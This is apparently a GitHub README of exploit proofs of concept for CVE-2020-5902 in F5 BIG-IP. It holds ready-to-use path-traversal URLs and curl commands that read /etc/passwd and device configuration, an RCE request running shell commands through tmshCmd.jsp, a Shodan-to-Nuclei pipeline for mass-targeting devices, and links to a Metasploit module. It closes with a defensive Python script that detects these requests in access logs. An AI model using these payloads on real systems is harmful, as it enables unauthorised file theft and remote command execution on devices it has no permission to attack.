# 🔸BIGIP CVE-2020-5902 Exploit POC 🔥🧱🔨👀

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

## LFI

```console
https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd
```

```console
https://{host}/tmui/login.jsp/..;/tmui/system/user/authproperties.jsp
```

```console
https://{host}/tmui/login.jsp/..;/tmui/util/getTabSet.jsp?tabId=jaffa
```

```console
https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.license
```

```console
https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.conf
```

## RCE

```console
https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=whoami
```

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

## 🎯 Manual POC 🔥

```bash
curl -sk 'https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd'
```

```bash
curl -sk 'https://{IP}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd'
```

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

## 📜 Nuclei Detect CVE-2020-5902

https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/CVE-2020-5902.yaml

```console
nuclei -t ~/tool/nuclei/nuclei-templates/cves/CVE-2020-5902.yaml -l https.txt
```

![image](https://i.ibb.co/hHsWjrk/4.png)

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

![image](https://i.ibb.co/fNm0JGL/2.png)

## 🔎 NMAP Script for CVE-2020-5902

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

```bash
wget https://raw.githubusercontent.com/RootUp/PersonalStuff/master/http-vuln-cve2020-5902.nse
```

```console
nmap -p443 {IP} --script=http-vuln-cve2020-5902.nse
```

![image](https://i.ibb.co/S0df0bk/5.png)

## 🚩CVE-2020-5902 Scanner Python Script

https://github.com/dunderhay/CVE-2020-5902

https://github.com/aqhmal/CVE-2020-5902-Scanner

## 💡 Automate Finding CVE-2020-5902 🔎

https://medium.com/@dwi.siswanto98/weaponizes-nuclei-workflows-to-pwn-all-the-things-cd01223feb77

```bash
shodan search org:"Target" http.favicon.hash:-335242539 --fields ip_str,port --separator " " | awk '{print $1":"$2}' | httprobe | nuclei -t workflows/bigip-pwner-workflow.yaml
```

## 🔨RCE Metasploit CVE-2020-5902

https://github.com/rapid7/metasploit-framework/pull/13807#

`modules/exploits/linux/http/f5_bigip_tmui_rce.rb`

https://github.com/rapid7/metasploit-framework/pull/13807/commits/0417e88ff24bf05b8874c953bd91600f10186ba4
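
## Detecting these requests in access logs

Every request in the LFI and RCE sections shares the `/tmui/login.jsp/..;/` prefix, so the same pattern can be hunted for in web access logs. The sketch below is an added example, not code from this repository or from any of the linked projects; it assumes Common Log Format lines, and the function names and sample lines are constructed for illustration.

```python
import re
from urllib.parse import unquote, urlsplit

# JSP endpoints that appear in the LFI and RCE requests listed on this page.
TMUI_ENDPOINTS = ("fileRead.jsp", "tmshCmd.jsp", "authproperties.jsp", "getTabSet.jsp")

# Assumption: access logs are in Common Log Format.
LOG_RE = re.compile(r'^(?P<src>\S+) .*?"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')

def normalise(path, rounds=3):
    """Percent-decode until stable so encoded forms of '..;' compare as plain text."""
    for _ in range(rounds):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path

def classify(line):
    """Return a finding dict for a TMUI '..;' traversal request, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    path = normalise(parts.path)
    if "/tmui/" not in path.lower() or "..;" not in path:
        return None
    endpoint = next((e for e in TMUI_ENDPOINTS if path.endswith("/" + e)), "other")
    status = int(m.group("status"))
    # "answered" marks requests the server replied to with 200: triage these first.
    return {"src": m.group("src"), "endpoint": endpoint,
            "query": parts.query, "status": status, "answered": status == 200}

def scan(lines):
    """Classify every line and keep only the findings."""
    return [f for f in map(classify, lines) if f]

# Constructed sample lines (documentation IP ranges), not taken from a real device.
SAMPLE_LOG = [
    '203.0.113.7 - - [06/Jul/2020:10:01:02 +0000] "GET /tmui/login.jsp HTTP/1.1" 200 5120',
    '203.0.113.7 - - [06/Jul/2020:10:01:05 +0000] "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd HTTP/1.1" 200 1843',
    '198.51.100.23 - - [06/Jul/2020:10:02:11 +0000] "GET /tmui/login.jsp/%2e%2e%3b/tmui/locallb/workspace/tmshCmd.jsp?command=whoami HTTP/1.1" 404 0',
    '198.51.100.9 - - [06/Jul/2020:10:03:40 +0000] "GET /index.html HTTP/1.1" 200 512',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A finding with `answered` set means the server returned 200 to a traversal request, which is the case to escalate; the `query` field shows which file or command was requested.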